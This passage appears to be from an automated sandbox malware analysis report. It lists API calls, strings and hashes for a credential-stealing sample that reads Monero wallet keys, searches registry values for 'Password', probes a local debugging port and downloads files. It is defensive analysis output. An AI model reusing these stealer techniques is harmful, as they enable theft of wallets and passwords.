                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 79b9fd7e26d11aa3142e09aadeaaf4f164ab79735218650d3051ce52cb36f1c4
                                        • Instruction ID: c99c6a4c5c3f6c74c0e2ffad6e612e634094e2614636d359b5d84cb751d90849
                                        • Opcode Fuzzy Hash: 79b9fd7e26d11aa3142e09aadeaaf4f164ab79735218650d3051ce52cb36f1c4
                                        • Instruction Fuzzy Hash: 4771C8B6900218ABDB14EBA0ED46FEE73B9AF88700F045598F605B7185EB35DB44CF91
                                        APIs
                                          • Part of subcall function 00E112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                          • Part of subcall function 00E112A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                          • Part of subcall function 00E112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                          • Part of subcall function 00E112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                          • Part of subcall function 00E112A0: RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E1134F
                                        • lstrlen.KERNEL32(?), ref: 00E1135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00E11377
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E11465
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E114EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 9f3858c5b0578f71f79e1a40161507f8eb7c8316fc7dec23b72f0b1347d5152f
                                        • Instruction ID: c6664a48fb6618f89ca609dab7267a5af1ad55f0e729fc78617b7664204271be
                                        • Opcode Fuzzy Hash: 9f3858c5b0578f71f79e1a40161507f8eb7c8316fc7dec23b72f0b1347d5152f
                                        • Instruction Fuzzy Hash: 0A5154B1D5022857CB14FB60ED96FED73BDAF54700F4455E8B60A72081EE306B88CBA6
                                        APIs
                                        • InternetOpenA.WININET(00E30AF6,00000001,00000000,00000000,00000000), ref: 00E19A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E19AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 00E19AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 8c9fa9fdb8f558d0c21b4a1afded9f1f7a97d1e48679c3c69059c8a4c81d9021
                                        • Instruction ID: a477282fc353eca7e22bb35d689fe7ed9730d6157b915f072513ce8068ea8b6d
                                        • Opcode Fuzzy Hash: 8c9fa9fdb8f558d0c21b4a1afded9f1f7a97d1e48679c3c69059c8a4c81d9021
                                        • Instruction Fuzzy Hash: 67415C35A50218ABCB24EFA4DC95FDDB7B4BB48740F105098F149BB191CBB4AEC0CB60
                                        APIs
                                          • Part of subcall function 00E17330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1739A
                                          • Part of subcall function 00E17330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E17411
                                          • Part of subcall function 00E17330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1746D
                                          • Part of subcall function 00E17330: GetProcessHeap.KERNEL32(00000000,?), ref: 00E174B2
                                          • Part of subcall function 00E17330: HeapFree.KERNEL32(00000000), ref: 00E174B9
                                        • lstrcat.KERNEL32(00000000,00E3192C), ref: 00E17666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E176A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 00E176BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E176EF
                                        • lstrcat.KERNEL32(00000000,00E31934), ref: 00E17700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E17733
                                        • lstrcat.KERNEL32(00000000,00E31938), ref: 00E1774D
                                        • task.LIBCPMTD ref: 00E1775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: 704c7104541f049207de8216530d4e0e7a9f4c865c886968a9f90e3e8dff6425
                                        • Instruction ID: dfe981441b356d6da3b06a4281742f04fb5a64d5d966e851faa1d6dd490e17e5
                                        • Opcode Fuzzy Hash: 704c7104541f049207de8216530d4e0e7a9f4c865c886968a9f90e3e8dff6425
                                        • Instruction Fuzzy Hash: 5531A176E00108EBDB18EBE0DD95DFF77F8AB44701F105119F142BB294CA39A985CB90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01A8ECC8,00000000,?,00E30E14,00000000,?,00000000), ref: 00E282C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E282C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E282E8
                                        • __aulldiv.LIBCMT ref: 00E28302
                                        • __aulldiv.LIBCMT ref: 00E28310
                                        • wsprintfA.USER32 ref: 00E2833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 1c3e386dca8c1c5b3bbb258853d7959aedfa9b792e99b386f31315299e507f73
                                        • Instruction ID: c4e5ffd1749861a38f20aa071c285c9061ed6f7b83913310e80ce3d6036d30d2
                                        • Opcode Fuzzy Hash: 1c3e386dca8c1c5b3bbb258853d7959aedfa9b792e99b386f31315299e507f73
                                        • Instruction Fuzzy Hash: D8215CB1E44318ABDB10DFD5DD4AFAEBBB8FB44B00F104609F215BB280C77969008BA4
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
                                          • Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899
                                        • InternetOpenA.WININET(00E30DFB,00000001,00000000,00000000,00000000), ref: 00E1615F
                                        • StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E161DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E16203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00E1622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E1625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00E16299
                                        • InternetCloseHandle.WININET(?), ref: 00E162A3
                                        • InternetCloseHandle.WININET(00000000), ref: 00E162B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 9ab24cac26fc6149b852954bebfa3ecd616372c447b167b0e60acd385e9d5c14
                                        • Instruction ID: d0a5086038f402ed960ea9f1516b2d57f66b0fd059a3492d0fa42aa7d0aa5b7c
                                        • Opcode Fuzzy Hash: 9ab24cac26fc6149b852954bebfa3ecd616372c447b167b0e60acd385e9d5c14
                                        • Instruction Fuzzy Hash: 365171B1A00218ABDF24DF94DC45BEE77B9AB44705F008098F605BB1C0DB75AAC9CF95
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 00E9024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 00E9035B
                                        • CatchIt.LIBVCRUNTIME ref: 00E903AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 00E904C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 502696aaca0e10e22ca525dace578fd5f7b358abcaffa4a03df9ab9af7f2768a
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 82B19D71800209EFCF25EFA4C8819AEBBB5FF04314F94616AE9297B252D731DA51CF91
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E17411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E174B2
                                        • HeapFree.KERNEL32(00000000), ref: 00E174B9
                                        • task.LIBCPMTD ref: 00E175B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: b22a6df25508b2fe2bf7cc03cc119f724e33ed27571d7634a8b6fe2014dffd92
                                        • Instruction ID: e65ab1f40a6b5b7880eb05dbe06f176563e77016eb37e5c464310052ce823e80
                                        • Opcode Fuzzy Hash: b22a6df25508b2fe2bf7cc03cc119f724e33ed27571d7634a8b6fe2014dffd92
                                        • Instruction Fuzzy Hash: DF614BB190426C9BDB24DB50CC55BDAB7B9BF48700F0081E9E689B6141EF706BC9CF90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E278C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E278CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,01A7BB78,00000000,00020119,Ix), ref: 00E278EB
                                        • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E2790A
                                        • RegCloseKey.ADVAPI32(Ix), ref: 00E27914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber$Ix
                                        • API String ID: 3225020163-4041952297
                                        • Opcode ID: 1a4dfbae7247c6f81322a61291635908a09a735aff8d6f9328d845ea5c7f1378
                                        • Instruction ID: fcfe41526257e84b7519a6e8e934d3257fbbeea03604742a3fd5689e236c0fee
                                        • Opcode Fuzzy Hash: 1a4dfbae7247c6f81322a61291635908a09a735aff8d6f9328d845ea5c7f1378
                                        • Instruction Fuzzy Hash: A70167B5E40309BFDB10DBD5EC4AFAEB7B8EB44B00F004598F645AB284D7759A40CB90
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • lstrlen.KERNEL32(00000000), ref: 00E1BC6F
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E1BC9D
                                        • lstrlen.KERNEL32(00000000), ref: 00E1BD75
                                        • lstrlen.KERNEL32(00000000), ref: 00E1BD89
                                        Strings
                                        Memory Dump Source
